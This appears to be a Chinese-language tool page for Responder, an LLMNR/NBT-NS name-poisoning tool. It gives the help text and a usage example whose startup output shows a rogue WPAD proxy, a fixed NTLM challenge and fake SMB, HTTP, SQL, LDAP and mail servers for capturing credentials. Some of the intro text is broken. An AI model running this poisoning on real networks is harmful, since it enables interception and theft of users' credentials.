responder 介绍

这个工具首先是一个LLMNR和NBT-NS响应,将根据其名称后缀回答*具体* NBT-NS(NetBIOS名称的服务)查询(见 。默认情况下,该工具将只响应到文件服务器服务的要求,对于中小型企业针对这种响应背后的概念,并在网络上隐蔽。这也有助于确保我们不打破合法NBT-NS的行为。如果你想用这个工具来响应工作站服务请求的后缀名,可以设置通过命令行-r选项为1。

responder 首页
responder 源代码版本库


responder - NBT-NS/LLMNR响应

:~# responder -h
Usage: python /usr/bin/responder -i -b On -r On

  -h, --help            show this help message and exit
  -A, --analyze         Analyze mode. This option allows you to see NBT-NS,
                        BROWSER, LLMNR requests from which workstation to
                        which workstation without poisoning anything.
  -i, --ip=
                        The ip address to redirect the traffic to. (usually
  -I eth0, --interface=eth0
                        Network interface to use
  -b Off, --basic=Off   Set this to On if you want to return a Basic HTTP
                        authentication. Off will return an NTLM
                        authentication.This option is mandatory.
  -r Off, --wredir=Off  Set this to enable answers for netbios wredir suffix
                        queries. Answering to wredir will likely break stuff
                        on the network (like classics 'nbns spoofer' will).
                        Default value is therefore set to Off
  -f Off, --fingerprint=Off
                        This option allows you to fingerprint a host that
                        issued an NBT-NS or LLMNR query.
  -w On, --wpad=On      Set this to On or Off to start/stop the WPAD rogue
                        proxy server. Default value is Off
  -F Off, --ForceWpadAuth=Off
                        Set this to On or Off to force NTLM/Basic
                        authentication on wpad.dat file retrieval. This might
                        cause a login prompt in some specific cases. Default
                        value is Off
  --lm=Off              Set this to On if you want to force LM hashing
                        downgrade for Windows XP/2003 and earlier. Default
                        value is Off
  -v                    More verbose

responder 用法示例

重定向到指定IP地址(-i,使WPAD流氓代理(-w On),开启NetBIOS wredir回应(-r On),跟fingerprinting(-f On):

:~# responder -i -w On -r On -f On
NBT Name Service/LLMNR Responder 2.0.
Please send bugs/comments to:
To kill this script hit CRTL-C

[+]NBT-NS & LLMNR responder started
[+]Loading Responder.conf File..
Global Parameters set:
Responder is bound to this interface:ALL
Challenge set is:1122334455667788
WPAD Proxy Server is:ON
WPAD script loaded:function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return 'PROXY ISAProxySrv:3141; DIRECT';}
HTTP Server is:ON
HTTPS Server is:ON
SMB Server is:ON
SMB LM support is set to:OFF
SQL Server is:ON
FTP Server is:ON
IMAP Server is:ON
POP3 Server is:ON
SMTP Server is:ON
DNS Server is:ON
LDAP Server is:ON
FingerPrint Module is:ON
Serving Executable via HTTP&WPAD is:OFF
Always Serving a Specific File via HTTP&WPAD is:OFF